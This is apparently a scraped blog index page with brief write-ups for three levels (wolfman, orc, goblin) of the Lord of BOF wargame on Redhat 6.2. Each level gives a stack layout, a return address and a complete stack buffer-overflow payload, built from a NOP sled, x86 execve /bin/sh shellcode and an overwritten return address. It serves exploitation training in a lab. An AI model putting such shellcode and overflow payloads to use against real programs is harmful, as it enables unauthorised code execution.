LOB Redhat 6.2 - wolfman wolfman - egghunter + buffer hunter + check length of argv[1]Stack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffbfcPayload : ./darkelf `python -c 'print "A"*44 + "\xfc\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using argv[2] address 더보기 LOB Redhat 6.2 - orc orc - egghunter + buffer hunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc44Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'` Using argv[1] address 더보기 LOB Redhat 6.2 - goblin goblin - egghunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc01Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using buffer address 더보기 이전 1 ··· 61 62 63 64 65 66 67 ··· 75 다음
